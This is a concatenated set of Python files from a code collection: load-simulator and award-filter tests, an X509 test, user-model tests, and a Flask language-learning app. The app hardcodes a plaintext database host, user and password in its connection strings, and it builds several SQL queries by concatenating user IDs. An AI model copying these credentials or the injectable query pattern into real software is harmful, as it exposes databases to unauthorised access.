self.assertEqual(sim.records[2].uid, 'USER003')
self.assertEqual(sim.records[2].password, 'PASSWORD003')
self.assertEqual(sim.records[2].commonName, 'Test User 003')
self.assertEqual(sim.records[2].email, 'USER003@example2.com')
def test_specifyRuntime(self):
"""
L{LoadSimulator.fromCommandLine} recognizes the I{--runtime} option to
specify a limit on how long the simulation will run.
"""
config = FilePath(self.mktemp())
config.setContent(VALID_CONFIG_PLIST)
sim = LoadSimulator.fromCommandLine(['--config', config.path, '--runtime', '123'])
self.assertEqual(123, sim.runtime)
def test_loadServerConfig(self):
"""
        The Calendar Server host and port are loaded from the [servers]
        section of the configuration file specified.
"""
config = FilePath(self.mktemp())
config.setContent(
writePlistToString({"servers": {
"PodA": {
"enabled": True,
"uri": 'https://127.0.0.3:8432/',
"stats": {"enabled": False},
},
}})
)
sim = LoadSimulator.fromCommandLine(['--config', config.path])
self.assertEquals(sim.servers["PodA"]["uri"], "https://127.0.0.3:8432/")
def test_loadArrivalConfig(self):
"""
The arrival policy type and arguments are loaded from the
[arrival] section of the configuration file specified.
"""
config = FilePath(self.mktemp())
config.setContent(
writePlistToString({
"arrival": {
"factory": "contrib.performance.loadtest.population.SmoothRampUp",
"params": {
"groups": 10,
"groupSize": 1,
"interval": 3,
},
},
})
)
sim = LoadSimulator.fromCommandLine(['--config', config.path])
self.assertEquals(
sim.arrival,
Arrival(SmoothRampUp, dict(groups=10, groupSize=1, interval=3)))
def test_createArrivalPolicy(self):
"""
L{LoadSimulator.createArrivalPolicy} creates an arrival
policy based on the L{Arrival} passed to its initializer.
"""
class FakeArrival(object):
def __init__(self, reactor, x, y):
self.reactor = reactor
self.x = x
self.y = y
reactor = object()
sim = LoadSimulator(
None, None, None, None, Arrival(FakeArrival, {'x': 3, 'y': 2}), None, reactor=reactor)
arrival = sim.createArrivalPolicy()
self.assertIsInstance(arrival, FakeArrival)
self.assertIdentical(arrival.reactor, sim.reactor)
self.assertEquals(arrival.x, 3)
self.assertEquals(arrival.y, 2)
def test_loadPopulationParameters(self):
"""
Client weights and profiles are loaded from the [clients]
section of the configuration file specified.
"""
config = FilePath(self.mktemp())
config.setContent(
writePlistToString(
{
"clients": [
{
"software": "contrib.performance.loadtest.ical.OS_X_10_6",
"params": {
"foo": "bar"
},
"profiles": [
{
"params": {
"interval": 25,
"eventStartDistribution": {
"type": "contrib.performance.stats.NormalDistribution",
"params": {
"mu": 123,
"sigma": 456,
}
}
},
"class": "contrib.performance.loadtest.profiles.Eventer"
}
],
"weight": 3,
}
]
}
)
)
sim = LoadSimulator.fromCommandLine(
['--config', config.path, '--clients', config.path]
)
expectedParameters = PopulationParameters()
expectedParameters.addClient(
3,
ClientType(
OS_X_10_6,
{"foo": "bar"},
[
ProfileType(
Eventer, {
"interval": 25,
"eventStartDistribution": NormalDistribution(123, 456)
}
)
]
)
)
self.assertEquals(sim.parameters, expectedParameters)
def test_requireClient(self):
"""
At least one client is required, so if a configuration with an
empty clients array is specified, a single default client type
is used.
"""
config = FilePath(self.mktemp())
config.setContent(writePlistToString({"clients": []}))
sim = LoadSimulator.fromCommandLine(
['--config', config.path, '--clients', config.path]
)
expectedParameters = PopulationParameters()
expectedParameters.addClient(
1, ClientType(OS_X_10_6, {}, [Eventer, Inviter, Accepter]))
self.assertEquals(sim.parameters, expectedParameters)
def test_loadLogObservers(self):
"""
Log observers specified in the [observers] section of the
configuration file are added to the logging system.
"""
config = FilePath(self.mktemp())
config.setContent(
writePlistToString(
{
"observers": [
{
"type": "contrib.performance.loadtest.population.SimpleStatistics",
"params": {},
},
]
}
)
)
sim = LoadSimulator.fromCommandLine(['--config', config.path])
self.assertEquals(len(sim.observers), 1)
self.assertIsInstance(sim.observers[0], SimpleStatistics)
def test_observeRunReport(self):
"""
Each log observer is added to the log publisher before the
simulation run is started and has its C{report} method called
after the simulation run completes.
"""
observers = [Observer()]
sim = LoadSimulator(
{
"PodA": {
"enabled": True,
"uri": 'http://example.org:1234/',
"stats": {"enabled": False},
},
},
"/principals/users/%s/",
None,
None,
Arrival(lambda reactor: NullArrival(), {}),
None, observers, reactor=Reactor())
io = StringIO()
sim.run(io)
self.assertEquals(io.getvalue(), "\n*** PASS\n")
self.assertTrue(observers[0].reported)
self.assertEquals(
[e for e in observers[0].events if "thingo" in e][0]["thingo"],
Reactor.message
)
| 35.948304
| 140
| 0.554242
|
ca112b6837b31917ef60859c69b4cd4c59d050d8
| 10,341
|
py
|
Python
|
usaspending_api/search/tests/integration/hierarchical_filters/test_tas_filter_heirarchical_cases.py
|
g4brielvs/usaspending-api
|
bae7da2c204937ec1cdf75c052405b13145728d5
|
[
"CC0-1.0"
] | 217
|
2016-11-03T17:09:53.000Z
|
2022-03-10T04:17:54.000Z
|
usaspending_api/search/tests/integration/hierarchical_filters/test_tas_filter_heirarchical_cases.py
|
g4brielvs/usaspending-api
|
bae7da2c204937ec1cdf75c052405b13145728d5
|
[
"CC0-1.0"
] | 622
|
2016-09-02T19:18:23.000Z
|
2022-03-29T17:11:01.000Z
|
usaspending_api/search/tests/integration/hierarchical_filters/test_tas_filter_heirarchical_cases.py
|
g4brielvs/usaspending-api
|
bae7da2c204937ec1cdf75c052405b13145728d5
|
[
"CC0-1.0"
] | 93
|
2016-09-07T20:28:57.000Z
|
2022-02-25T00:25:27.000Z
|
import pytest
from usaspending_api.search.tests.integration.hierarchical_filters.tas_fixtures import (
BASIC_TAS,
ATA_TAS,
SISTER_TAS,
TAS_DICTIONARIES,
TAS_STRINGS,
)
from usaspending_api.search.tests.integration.hierarchical_filters.tas_search_test_helpers import (
_setup_es,
query_by_tas,
)
@pytest.mark.django_db
def test_agency_level_require_match(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"require": [_agency_path(BASIC_TAS)]})
assert resp.json()["results"] == [_award1()]
@pytest.mark.django_db
def test_fa_level_require_match(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"require": [_fa_path(BASIC_TAS)]})
assert resp.json()["results"] == [_award1()]
@pytest.mark.django_db
def test_tas_level_require_match(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"require": [_tas_path(BASIC_TAS)]})
assert resp.json()["results"] == [_award1()]
@pytest.mark.django_db
def test_agency_level_exclude_match(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"exclude": [_agency_path(ATA_TAS)]})
assert resp.json()["results"] == [_award1()]
@pytest.mark.django_db
def test_fa_level_exclude_match(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"exclude": [_fa_path(ATA_TAS)]})
assert resp.json()["results"] == [_award1()]
@pytest.mark.django_db
def test_tas_level_exclude_match(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"exclude": [_tas_path(ATA_TAS)]})
assert resp.json()["results"] == [_award1()]
@pytest.mark.django_db
def test_agency_level_require_non_match(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"require": [_agency_path(ATA_TAS)]})
assert resp.json()["results"] == []
@pytest.mark.django_db
def test_fa_level_require_non_match(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"require": [_fa_path(ATA_TAS)]})
assert resp.json()["results"] == []
@pytest.mark.django_db
def test_tas_level_require_non_match(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"require": [_tas_path(ATA_TAS)]})
assert resp.json()["results"] == []
@pytest.mark.django_db
def test_agency_level_exclude_non_match(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"exclude": [_agency_path(BASIC_TAS)]})
assert resp.json()["results"] == []
@pytest.mark.django_db
def test_fa_level_exclude_non_match(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"exclude": [_fa_path(BASIC_TAS)]})
assert resp.json()["results"] == []
@pytest.mark.django_db
def test_tas_level_exclude_non_match(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"exclude": [_tas_path(BASIC_TAS)]})
assert resp.json()["results"] == []
@pytest.mark.django_db
def test_double_require(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"require": [_fa_path(BASIC_TAS), _tas_path(BASIC_TAS)]})
assert resp.json()["results"] == [_award1()]
@pytest.mark.django_db
def test_double_exclude(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"exclude": [_fa_path(BASIC_TAS), _tas_path(BASIC_TAS)]})
assert resp.json()["results"] == []
@pytest.mark.django_db
def test_exclude_overrides_require(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"require": [_tas_path(BASIC_TAS)], "exclude": [_tas_path(BASIC_TAS)]})
assert resp.json()["results"] == []
@pytest.mark.django_db
def test_exclude_eclipsing_require(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"require": [_agency_path(BASIC_TAS)], "exclude": [_fa_path(BASIC_TAS)]})
assert resp.json()["results"] == []
@pytest.mark.django_db
def test_require_eclipsing_exclude(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"require": [_fa_path(BASIC_TAS)], "exclude": [_agency_path(BASIC_TAS)]})
assert resp.json()["results"] == [_award1()]
@pytest.mark.django_db
def test_double_eclipsing_filters(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(
client, {"require": [_agency_path(BASIC_TAS), _tas_path(BASIC_TAS)], "exclude": [_fa_path(BASIC_TAS)]}
)
assert resp.json()["results"] == [_award1()]
@pytest.mark.django_db
def test_double_eclipsing_filters2(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(
client, {"require": [_fa_path(BASIC_TAS)], "exclude": [_agency_path(BASIC_TAS), _tas_path(BASIC_TAS)]}
)
assert resp.json()["results"] == []
@pytest.mark.django_db
def test_sibling_eclipsing_filters(client, monkeypatch, elasticsearch_award_index, multiple_awards_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(
client,
{
"require": [_agency_path(BASIC_TAS), _tas_path(ATA_TAS)],
"exclude": [_agency_path(ATA_TAS), _tas_path(BASIC_TAS)],
},
)
assert resp.json()["results"] == [_award2()]
@pytest.mark.django_db
def test_sibling_filters_on_one_sibling(
client, monkeypatch, elasticsearch_award_index, multiple_awards_with_sibling_tas
):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"require": [_tas_path(SISTER_TAS[1])]})
assert resp.json()["results"] == [_award2()]
@pytest.mark.django_db
def test_sibling_filters_on_both_siblings(
client, monkeypatch, elasticsearch_award_index, multiple_awards_with_sibling_tas
):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"require": [_tas_path(SISTER_TAS[0]), _tas_path(SISTER_TAS[1])]})
assert resp.json()["results"].sort(key=lambda elem: elem["internal_id"]) == [_award1(), _award2()].sort(
key=lambda elem: elem["internal_id"]
)
@pytest.mark.django_db
def test_sibling_filters_excluding_one_sibling(
client, monkeypatch, elasticsearch_award_index, multiple_awards_with_sibling_tas
):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(
client, {"require": [_tas_path(SISTER_TAS[0]), _tas_path(SISTER_TAS[2])], "exclude": [_tas_path(SISTER_TAS[2])]}
)
assert resp.json()["results"] == [_award1()]
@pytest.mark.django_db
def test_sibling_filters_excluding_two_siblings(
client, monkeypatch, elasticsearch_award_index, multiple_awards_with_sibling_tas
):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(
client,
{
"require": [_tas_path(SISTER_TAS[0]), _tas_path(SISTER_TAS[1])],
"exclude": [_tas_path(SISTER_TAS[0]), _tas_path(SISTER_TAS[2])],
},
)
assert resp.json()["results"] == [_award2()]
@pytest.mark.django_db
def test_sibling_filters_with_fa_excluding_one_sibling(
client, monkeypatch, elasticsearch_award_index, multiple_awards_with_sibling_tas
):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(
client,
{
"require": [_fa_path(SISTER_TAS[0]), _tas_path(SISTER_TAS[0]), _tas_path(SISTER_TAS[2])],
"exclude": [_tas_path(SISTER_TAS[2])],
},
)
assert resp.json()["results"].sort(key=lambda elem: elem["internal_id"]) == [_award1(), _award2()].sort(
key=lambda elem: elem["internal_id"]
)
@pytest.mark.django_db
def test_sibling_filters_with_fa_excluding_two_siblings(
client, monkeypatch, elasticsearch_award_index, multiple_awards_with_sibling_tas
):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(
client,
{
"require": [_fa_path(SISTER_TAS[0]), _tas_path(SISTER_TAS[0]), _tas_path(SISTER_TAS[1])],
"exclude": [_tas_path(SISTER_TAS[0]), _tas_path(SISTER_TAS[2])],
},
)
assert resp.json()["results"] == [_award2()]
def _award1():
return {"internal_id": 1, "Award ID": "abcdefg", "generated_internal_id": "AWARD_1"}
def _award2():
return {"internal_id": 2, "Award ID": "abcdefg", "generated_internal_id": "AWARD_2"}
def _agency_path(index):
return [_agency(index)]
def _fa_path(index):
return [_agency(index), _fa(index)]
def _tas_path(index):
return [_agency(index), _fa(index), _tas(index)]
def _agency(index):
return TAS_DICTIONARIES[index]["aid"]
def _fa(index):
return f"{TAS_DICTIONARIES[index]['aid']}-{TAS_DICTIONARIES[index]['main']}"
def _tas(index):
return TAS_STRINGS[index]
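# Taken together, the helpers above build the three levels of the hierarchical
# TAS filter: [agency], [agency, federal account], and
# [agency, federal account, TAS].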
def _sort_by_id(dictionary):
    # The original body evaluated the key without returning it; a sort-key
    # helper needs to return the value.
    return dictionary["internal_id"]
| 34.016447 | 120 | 0.736389 |
c5237d62756d3cd1377f8fc3d2b2a7f2734739bb | 1,925 | py | Python | tests/test_models.py | notna888/pyLaridae | 4e07dcce30e818e0ad75001d579f4ad486e841f3 | ["MIT"] | null | null | null | tests/test_models.py | notna888/pyLaridae | 4e07dcce30e818e0ad75001d579f4ad486e841f3 | ["MIT"] | null | null | null | tests/test_models.py | notna888/pyLaridae | 4e07dcce30e818e0ad75001d579f4ad486e841f3 | ["MIT"] | null | null | null |
# -*- coding: utf-8 -*-
"""Model unit tests."""
import datetime as dt
import pytest
from pyLaridae.user.models import Role, User
from .factories import UserFactory
@pytest.mark.usefixtures("db")
class TestUser:
"""User tests."""
def test_get_by_id(self):
"""Get user by ID."""
user = User("foo", "foo@bar.com")
user.save()
retrieved = User.get_by_id(user.id)
assert retrieved == user
def test_created_at_defaults_to_datetime(self):
"""Test creation date."""
user = User(username="foo", email="foo@bar.com")
user.save()
assert bool(user.created_at)
assert isinstance(user.created_at, dt.datetime)
def test_password_is_nullable(self):
"""Test null password."""
user = User(username="foo", email="foo@bar.com")
user.save()
assert user.password is None
def test_factory(self, db):
"""Test user factory."""
user = UserFactory(password="myprecious")
db.session.commit()
assert bool(user.username)
assert bool(user.email)
assert bool(user.created_at)
assert user.is_admin is False
assert user.active is True
assert user.check_password("myprecious")
def test_check_password(self):
"""Check password."""
user = User.create(username="foo", email="foo@bar.com", password="foobarbaz123")
assert user.check_password("foobarbaz123") is True
assert user.check_password("barfoobaz") is False
def test_full_name(self):
"""User full name."""
user = UserFactory(first_name="Foo", last_name="Bar")
assert user.full_name == "Foo Bar"
def test_roles(self):
"""Add a role to a user."""
role = Role(name="admin")
role.save()
user = UserFactory()
user.roles.append(role)
user.save()
assert role in user.roles
| 28.731343 | 88 | 0.611948 |
24581d646e7fb9cd88142eaae17015665f477ce0 | 3,852 | py | Python | electrum_dash/tests/test_x509.py | sibcool/electrum-dash | e123699b34260fe799aa5da818c33fa9cdf8e4c9 | ["MIT"] | 1 | 2019-09-09T06:54:39.000Z | 2019-09-09T06:54:39.000Z | electrum_dash/tests/test_x509.py | sibcool/electrum-dash | e123699b34260fe799aa5da818c33fa9cdf8e4c9 | ["MIT"] | null | null | null | electrum_dash/tests/test_x509.py | sibcool/electrum-dash | e123699b34260fe799aa5da818c33fa9cdf8e4c9 | ["MIT"] | null | null | null |
import unittest
from electrum_dash.x509 import X509
class TestX509(unittest.TestCase):
def test_generalizedtime(self):
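        # The validity field of this DER blob pairs a UTCTime ("180206010225Z",
        # tag 0x17) with a GeneralizedTime ("21180113010225Z", tag 0x18), so
        # parsing it exercises both date encodings before check_date() runs.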
full = X509(b'0\x82\x05F0\x82\x03.\x02\t\x00\xfeV\xd6\xb5?\xb1j\xe40\r\x06\t*\x86H\x86\xf7\r\x01\x01\x0b\x05\x000d1\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x130\x11\x06\x03U\x04\x08\x0c\nCalifornia1!0\x1f\x06\x03U\x04\n\x0c\x18Internet Widgits Pty Ltd1\x1d0\x1b\x06\x03U\x04\x03\x0c\x14testnet.qtornado.com0 \x17\r180206010225Z\x18\x0f21180113010225Z0d1\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x130\x11\x06\x03U\x04\x08\x0c\nCalifornia1!0\x1f\x06\x03U\x04\n\x0c\x18Internet Widgits Pty Ltd1\x1d0\x1b\x06\x03U\x04\x03\x0c\x14testnet.qtornado.com0\x82\x02"0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x82\x02\x0f\x000\x82\x02\n\x02\x82\x02\x01\x00\xc2B\xe0\xa8\xd9$M\xbc)Wx\x0cv\x00\xc0\xfa2Ew:\xce\xa7\xcb\xc8\r?\xea\xc5R(\xc7\xc3Y\xe7zq=\xcd\x8d\xe3\x86\x9ecSI\xc7\x84\xf2~\x91\xd4\x19\xc2;\x97\xe81e\xf2\xeb\xf1\xadw\xa3p\x88A*-\r\xb6Yt\x98R\xe8\x8a\xf9\xb5>"F\xac\x19%\xc8~\x1d\xac\x93A\xffk\xce\xdb\xfc9\x05\xa0\xad\xf9V\x0f0\xa2b\xd0@\xe4\xf1\xb1\xe8\xb1\x10[&\xa1\xff\x13\xcfQ\xb7\x805\xef\xe7tL\xe5|\x08W\x8c\xd72\x9d\'\xeb\x92)3N\x01M\x06\xa9\xdc\xe4\'\x13\x90x\xd8\x830\x97\xa8\xcc2d \xfa\x91\x04\xd0\x1b\xe7\xaa t\x87\xba]\xb5w\x05(\xba\x07\xc2X$~?L\xc5\x03\xb2\xdeQ\xf3\xf3\xdab\xd9\x92\xd9\x86^:\x93\xc9\x86~\xd1\x94\xd4\x80\x9c\xff0\xc6m\xf4\xf0\xd6\x18\x96l\x1d\x0c\xe8\x15 \x8c\x89\xcb\xa4*\xd9\xefg\x844\x81\xb3\xce\xa1\x8a|\xf9h\xc3\xe1!\xfeZ`\xb71\x97Kj\x0b"\xd3\x98T\r\xd9\xbb<r\x0c\xd5Q\xd0L\x02\xcb\x19\x19\xd6\xdf$\xcej\xa8l\xbd\x81\x803\x95\x0e\x907&\x81J\x88\xaf\xa23\xb4q\x96\x08\xa9]}\xb8Rs\x89{\x04\x88/\xc1m\x8c\xe8\\X\x95 \x1cj\xf2(t\xd7\xef\x10-r\xb6\x17L\xce_\x1bf\xc0c\x18\x83\x99\xdf\xd5\xad\x88\xcd \xae\x07 \xed\xb6\xfc[\x9a/f\x92\xce^\x9c\xd9\x064\xb4\xcc\x1d,d\x99\xee\x9a4\xbe\xde0\x92\x8f/keq\x94\x9frf1\xda\xadM_\x11C\x19\x01\xf0\xe0I\x84W\xf9\xaa\xd3\x12ex\x89"\xbfQ\x1f\xbdU\xa0\x92\xa3\x9d\xdb?\x86\x82\x0b\x1e\xe0\x8aSq\xce%\xea4\xfb\x82\x92\x0f\xcf\xaa\xe2\r\xedd\xba\xff\x85\xa2+\xb0x9\xba\'\xd3\xf5\xd6\xfa\xb43\x0b\xd4\xf4\xca\xa5\xb1\xe4[\xe7\xf7\xc3\xd3\xdd\x85)\xac5E\x17\xae\x03fCC(\x06\x1cU\xedM\x90r\xe87\x8d}\xf1i\xfdO\x83\x05\x83\x83y\xd9f,\xe1\xba\xf0\\y\x8d\x08`\xb1\x02\x03\x01\x00\x010\r\x06\t*\x86H\x86\xf7\r\x01\x01\x0b\x05\x00\x03\x82\x02\x01\x00,.\x12jC3\x9fdF\x15\x16\xea*1\x0b[\xfa-\xcf\x80\x17\xf0\xfa\xf4\x96C\xff\xf9\xe9\xa2N\xda\xf1&6\x9ecV~\xea[\x07\xc1R\x03\x95\xd4\x84B\xe2r\x92\xad<mp\xf1\xcb\xb3\x8b\xbf \x08\x12\x1e6\xe3\xad\xbd1\x81\xbe\xaex\x002\xb6\xf9\xa0\xf6\xb7E^"\r\xa0w\x08\x14\xe7\x84\x03q2\x9c\xac\xce>\xc6\x0b\x81\x81k\x0e\xd01\x16\x91\xe4A\x8c\x1a\xe9W\xd4=<\xd4m_\xd4m\xa4H\x14\xc0\xae\x12\xab\x808\xf1\xf9_\xbb\xfb\xd0U\x0e\\\xd3.?\xa36\xe1hstU"\x17P\xcb>\x83\x9c\xaa\x9b\xb7\xe5\xb4\xb5W\xdc\xc1\xee\x91K\x12\xc2\xe1U\xaf\xf7I`\x83\x91\x0c\xc0\xcb\x15\x13!V\xa9\xc1\xca\x1b\x80\xff\xd8\x1f\xd8_+\x83\xcd\xcb%\xd6\xb7\xdc\x8a2\xa8Q\x1f\xbb.\xdf\x05\xb7hD\xab\xea\xe9\xfb.\xdd\x93\xd1\xf0\xb8r\xb9t.\xab\xf6]\xac\xc9U9\x87\x9e\xe36 \x87\xe7eo\x98\xac\xf4\x87\x8e\xf4\xa86\xd3\xcapy\xee\xa0]\xdbA\xb9\x00\xe9_R\xc8\xf7\xca\x13\xc6\xb1Z|c\xe8v\xa24\xac?k\xf1\xc4\x97\x18\x07\xbaU\xc9\xf5? 
\x95\x8f\x11\xa7\xc9\x8eY\x9c\xdfnx?\x88\xba\x90\xef\x94WU\xb5\xcf\x0b"\xe8\xfe\xa6.\x0cr-\xaf3\x8a\xe6v\xf9\xb91\x87\x91\xc6\xb1\xe9\xb9UP\xf5\x14\xb7\x99\x80\xc0\xc5}\x9a~\x7f\x06\x1e\xb8\x05\xd5\xa2LXO\\73i\x82\xcd\xc6#\xb7\xa4q\xd7\xd4y\xb1d\xaf\xa8\t\x9e1K\xd94\xaf7\x08\x8c);\xd2\xed\x91\xc6\xed\x83\x90\r\xef\x85\xf0\xfeJi\x02;\xf0\x0b\x03\xe7\xc1\x84\xd45\xaeP\xc2Lp\x1akb\xcaP\xe9\xfc\xc1\xc8VPQu\x85\x92l\x12\xb99{\x91\xd0\xa6d\n\xde\xf85\x93e\xfa\\\xf9cKx8\x84"s\xb8\xe52~\x97\x05\xc3\xf6\x1c\xca\x0b\xda\x8b\x90\xfeu5,\x94,\x99\xf9\x9a\xf3T\x8dAZ\xc7\xe9\x95-\x98\xf2\xbaL\x89\xc0?\xba1\xb5\\t|RY_\xc6\xabr\xe8')
full.check_date()
| 550.285714 | 3,702 | 0.74325 |
f9f566caf8bd8154305b0fa8f078c09b96f33884 | 20,510 | py | Python | application.py | escottgoodwin/langoapi | 9f5e88a664addd2899968728049d5982cc2cecfe | ["MIT"] | null | null | null | application.py | escottgoodwin/langoapi | 9f5e88a664addd2899968728049d5982cc2cecfe | ["MIT"] | 2 | 2021-03-31T18:56:16.000Z | 2021-12-13T19:56:21.000Z | application.py | escottgoodwin/langoapi | 9f5e88a664addd2899968728049d5982cc2cecfe | ["MIT"] | null | null | null |
from random import randint
import os
from bs4 import BeautifulSoup
import json
from textblob import TextBlob
from gensim.models.doc2vec import Doc2Vec,TaggedDocument
import datetime
from datetime import datetime,timedelta
import requests
from stop_words import get_stop_words
import boto3
from scipy.spatial.distance import cosine
import goslate
import botocore
import psycopg2
import numpy as np
from operator import itemgetter
import pandas as pd
from flask import Flask, render_template, Response, request, redirect, url_for,session
application = app = Flask(__name__)
dbuser = os.environ['dbuser']
dbname = os.environ['dbname']
dbhost = os.environ['dbhost']
dbpassword= os.environ['dbpassword']
aws_access_key_id = os.environ['aws_access_key_id']
aws_secret_access_key = os.environ['aws_secret_access_key']
dbconnect = "dbname='"+dbname+"' user='"+dbuser+"' host='"+dbhost+"' password='"+dbpassword+"'"
app.secret_key = os.urandom(24)
def recent_arts(lang,days):
col_name = lang +'_vecs'
conn = psycopg2.connect("dbname='langalearn' user='ymroddi' host='lango84.cukbl7fyxfht.us-west-1.rds.amazonaws.com' password='royallord8413'")
cur = conn.cursor()
sql = "SELECT art_id,vec FROM " + col_name + " where dt > now() - interval '"+str(days)+ " days'"
cur.execute(sql)
recent_vecs = cur.fetchall()
conn.close()
rec_vec_np = [[x[0],np.array(x[1])] for x in recent_vecs]
return rec_vec_np
def user_prog_list(user_id):
conn = psycopg2.connect("dbname='langalearn' user='ymroddi' host='lango84.cukbl7fyxfht.us-west-1.rds.amazonaws.com' password='royallord8413'")
cur = conn.cursor()
sql="SELECT lang,exer_type,exer_resp FROM exer_progress WHERE user_id = '" + user_id + "'"
cur.execute(sql)
exercises = cur.fetchall()
conn.close()
if len(exercises)>0:
progrpt = progress_list(exercises)
return progrpt
else:
return 'none'
def progress_list(exercise_list):
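    # Group exercises by (language, exercise type); for each group report the
    # share of correct responses (exer_resp == True) as a percentage plus the
    # total attempt count.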
progdf = pd.DataFrame(exercise_list)
grped = progdf.groupby([0,1])
grplist = [x for x in grped]
prog_list = [[x[0],str(round((x[1][x[1][2]==True].count()[0]/x[1].count()[0])*100,1)),str(x[1].count()[0])] for x in grplist]
task_list = []
for x in prog_list:
lang = x[0][0]
if lang == 'de':
langt = 'German'
if lang == 'fr':
langt = 'French'
if lang == 'en':
langt = 'English'
if lang == 'es':
langt = 'Spanish'
exer = x[0][1]
if exer == 'image':
task = 'Image Identification'
if exer == 'verb_comp':
task = 'Verb Sentences'
if exer == 'sent_comp':
task = 'Sentence Completion'
item = {'langt':langt,'task':task,'percent':x[1],'total':x[2]}
task_list.append(item)
return task_list
def friend_list(user_id_friend,status):
conn = psycopg2.connect("dbname='langalearn' user='ymroddi' host='lango84.cukbl7fyxfht.us-west-1.rds.amazonaws.com' password='royallord8413'")
cur = conn.cursor()
sql="SELECT relationships.userid1,relationships.userid2,relationships.request_date,relationships.accept_date,user_ids.name FROM relationships,user_ids WHERE ((relationships.userid1 = "+str(user_id_friend)+" AND user_ids.id = "+str(user_id_friend)+") OR (relationships.userid2 = "+str(user_id_friend)+") AND user_ids.id = "+str(user_id_friend)+") AND relationships.status = " +str(status)
cur.execute(sql)
friend_rslt = cur.fetchall()
conn.close()
friends_list = []
for x in friend_rslt:
if x[0] != user_id_friend:
friends_list.append(x)
if x[1] != user_id_friend:
friends_list.append(x)
friends_list1 = [{'request_date':x[2].strftime('%m/%d/%Y'),'accept_date':x[3],'name':x[4]} for x in friends_list]
return friends_list1
def fetch_recs_id(friend_ids):
conn = psycopg2.connect("dbname='langalearn' user='ymroddi' host='lango84.cukbl7fyxfht.us-west-1.rds.amazonaws.com' password='royallord8413'")
cur = conn.cursor()
sql='SELECT id,name,native_lang,residence,login_status FROM user_ids WHERE id IN %s'
cur.execute(sql,(friend_ids,))
    friend_list = cur.fetchall()
    conn.close()
    dictrecs = [{'id':x[0],'name':x[1],'nativ_lang':x[2],'residence':x[3],'login_status':x[4]} for x in friend_list]
    return dictrecs
def cosine_rank(target_vec,time_vec,rec_num):
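    # Rank every (art_id, vector) pair by cosine similarity to target_vec;
    # scipy's cosine() returns a distance, so 1 - cosine(u, v) is the
    # similarity, and the rec_num highest-scoring articles are kept.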
dists = []
for vec in time_vec:
dist = 1 - cosine(target_vec,vec[1])
item = [dist,vec[0]]
dists.append(item)
ranked = sorted(dists, key=itemgetter(0),reverse=True)
return ranked[:rec_num]
def art_parser(link):
r = requests.get(link)
page = r.text
soup = BeautifulSoup(page,"lxml")
for x in soup('script'):
x.decompose()
for x in soup('link'):
x.decompose()
for x in soup('meta'):
x.decompose()
title = soup.title.string
    paras = soup('p')
    article_strips = [para.get_text() for para in paras]
    art = ' '.join(article_strips)
    return art, link, title
def load_models_s3(lang):
bucket_name = 'langlearn84'
KEY1 = lang + 'model3.model'
KEY2 = lang + 'model3.model.trainables.syn1neg.npy'
KEY3 = lang + 'model3.model.wv.vectors.npy'
# if d2v model not in directory, download it
if not os.path.exists(KEY1):
s3 = boto3.resource(
's3',
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key
)
try:
s3.Bucket(bucket_name).download_file(KEY1, KEY1)
print(KEY1)
s3.Bucket(bucket_name).download_file(KEY2, KEY2)
print(KEY2)
s3.Bucket(bucket_name).download_file(KEY3, KEY3)
print(KEY3)
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] == "404":
print("The object does not exist.")
else:
raise
lang_model = Doc2Vec.load(KEY1)
else:
